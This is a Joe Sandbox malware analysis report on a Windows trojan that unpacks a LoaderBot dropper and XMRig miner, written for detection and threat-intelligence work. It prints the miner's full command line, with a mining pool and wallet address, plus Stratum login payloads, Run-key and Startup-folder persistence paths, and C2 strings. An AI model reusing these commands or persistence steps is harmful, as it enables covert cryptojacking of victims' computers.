Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kWYLtJ0Cn1.exe

Overview

General Information

Sample name:kWYLtJ0Cn1.exe
renamed because original name is a hash value
Original sample name:917f9d9d484f8657efc7f60b8adde947.exe
Analysis ID:1479411
MD5:917f9d9d484f8657efc7f60b8adde947
SHA1:01e4648cef9fb934429d63471127805120202ca9
SHA256:1099655a13691a6c4856fa29fa038e89805c8ff7ba6d04c6c56128728be19ff4
Tags:32exetrojan
Infos:

Detection

LoaderBot, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Xmrig
Yara detected LoaderBot
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to inject code into remote processes
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Potential Crypto Mining Activity
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • kWYLtJ0Cn1.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\kWYLtJ0Cn1.exe" MD5: 917F9D9D484F8657EFC7F60B8ADDE947)
    • RegAsm.exe (PID: 7368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • Driver.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 7588 cmdline: C:\Windows\system32\WerFault.exe -u -p 7476 -s 764 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • Driver.exe (PID: 7632 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 4208 cmdline: C:\Windows\system32\WerFault.exe -u -p 7632 -s 864 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • Driver.exe (PID: 6272 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 8012 cmdline: C:\Windows\system32\WerFault.exe -u -p 6272 -s 864 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • Driver.exe (PID: 4336 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7540 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7572 cmdline: C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 3052 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 1368 cmdline: C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 4520 cmdline: C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.3707277603.00000000005FE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000007.00000002.3093772534.0000000000466000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000007.00000003.2163629523.0000000000465000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LoaderBotYara detected LoaderBotJoe Security
              Click to see the 25 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpackJoeSecurity_LoaderBotYara detected LoaderBotJoe Security
                0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpackMALWARE_Win_CoinMiner04Detects coinmining malwareditekSHen
                • 0x3f3735:$s1: createDll
                • 0x3f3a21:$s2: getTasks
                • 0x3f388f:$s3: SetStartup
                • 0x3f3763:$s4: loadUrl
                • 0x3f3912:$s5: Processer
                • 0x3f3a8e:$s6: checkProcess
                • 0x3f3a9b:$s7: runProcess
                • 0x3f393a:$s8: createDir
                • 0x3f3c4f:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                • 0x3f3ce3:$cnc2: ?hwid=
                • 0x3f3d13:$cnc3: ?timeout=1
                • 0x3f3e45:$cnc4: &completed=
                1.2.RegAsm.exe.400000.0.unpackJoeSecurity_LoaderBotYara detected LoaderBotJoe Security
                  1.2.RegAsm.exe.400000.0.unpackMALWARE_Win_CoinMiner04Detects coinmining malwareditekSHen
                  • 0x3f5535:$s1: createDll
                  • 0x3f5821:$s2: getTasks
                  • 0x3f568f:$s3: SetStartup
                  • 0x3f5563:$s4: loadUrl
                  • 0x3f5712:$s5: Processer
                  • 0x3f588e:$s6: checkProcess
                  • 0x3f589b:$s7: runProcess
                  • 0x3f573a:$s8: createDir
                  • 0x3f5a4f:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                  • 0x3f5ae3:$cnc2: ?hwid=
                  • 0x3f5b13:$cnc3: ?timeout=1
                  • 0x3f5c45:$cnc4: &completed=
                  0.2.kWYLtJ0Cn1.exe.f60000.0.unpackJoeSecurity_LoaderBotYara detected LoaderBotJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    Bitcoin Miner

                    barindex
                    Sigma detected: Xmrig
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2, CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 7368, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2, ProcessId: 7476, ProcessName: Driver.exe

                    System Summary

                    barindex
                    Sigma detected: Potential Crypto Mining Activity
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2, CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 7368, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2, ProcessId: 7476, ProcessName: Driver.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 7368, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7540, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 7368, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

                    Snort Signatures

                    No Snort rule has matched

                    Suricata Signatures

                    Timestamp:2024-07-23T15:48:56.694363+0200
                    SID:2826930
                    Source Port:49738
                    Destination Port:3333
                    Protocol:TCP
                    Classtype:Crypto Currency Mining Activity Detected
                    Timestamp:2024-07-23T15:45:21.326757+0200
                    SID:2826930
                    Source Port:49743
                    Destination Port:3333
                    Protocol:TCP
                    Classtype:Crypto Currency Mining Activity Detected
                    Timestamp:2024-07-23T15:45:36.297076+0200
                    SID:2047928
                    Source Port:51744
                    Destination Port:53
                    Protocol:UDP
                    Classtype:Crypto Currency Mining Activity Detected
                    Timestamp:2024-07-23T15:47:54.453933+0200
                    SID:2826930
                    Source Port:49730
                    Destination Port:3333
                    Protocol:TCP
                    Classtype:Crypto Currency Mining Activity Detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: kWYLtJ0Cn1.exeAvira: detected
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeReversingLabs: Detection: 60%
                    Multi AV Scanner detection for submitted file
                    Source: kWYLtJ0Cn1.exeReversingLabs: Detection: 50%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: kWYLtJ0Cn1.exeJoe Sandbox ML: detected

                    Bitcoin Miner

                    barindex
                    Yara detected Xmrig cryptocurrency miner
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000010.00000002.3707277603.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3093772534.0000000000466000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2163629523.0000000000465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1743254277.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.3283522965.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2163629523.0000000000463000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3707277603.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3093652919.000000000043D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1743254277.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.3184707132.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.3383726249.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2064137301.0000000000464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2399480104.0000000000465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kWYLtJ0Cn1.exe PID: 7312, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7368, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 7476, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 7632, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 6272, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 4336, type: MEMORYSTR
                    Detected Stratum mining protocol
                    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 141.94.96.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 141.94.96.71:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 141.94.96.71:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                    Source: global trafficTCP traffic: 192.168.2.4:49740 -> 141.94.96.144:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                    Source: global trafficTCP traffic: 192.168.2.4:49741 -> 141.94.96.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                    Source: global trafficTCP traffic: 192.168.2.4:49742 -> 141.94.96.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                    Source: global trafficTCP traffic: 192.168.2.4:49743 -> 141.94.96.144:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                    Source: global trafficTCP traffic: 192.168.2.4:49744 -> 141.94.96.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                    Source: global trafficTCP traffic: 192.168.2.4:49745 -> 141.94.96.144:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                    Found strings related to Crypto-Mining
                    Source: Driver.exeString found in binary or memory: stratum+tcp://
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: @cryptonight/0cn
                    Source: Driver.exeString found in binary or memory: stratum+tcp://
                    Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                    Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                    Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: XMRig 6.2.2
                    Source: kWYLtJ0Cn1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: kWYLtJ0Cn1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\9h4bqyhzw0\output.pdb source: kWYLtJ0Cn1.exe
                    Source: Binary string: C:\9h4bqyhzw0\output.pdb. source: kWYLtJ0Cn1.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 01213286h1_2_01212E1B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 012113A9h1_2_01211248
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h1_2_0121059C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h1_2_01210CE0
                    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 141.94.96.195:3333
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 141.94.96.71:3333
                    Source: global trafficTCP traffic: 192.168.2.4:49740 -> 141.94.96.144:3333
                    Source: Joe Sandbox ViewIP Address: 141.94.96.195 141.94.96.195
                    Source: Joe Sandbox ViewIP Address: 141.94.96.71 141.94.96.71
                    Source: Joe Sandbox ViewIP Address: 141.94.96.144 141.94.96.144
                    Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                    Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                    Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
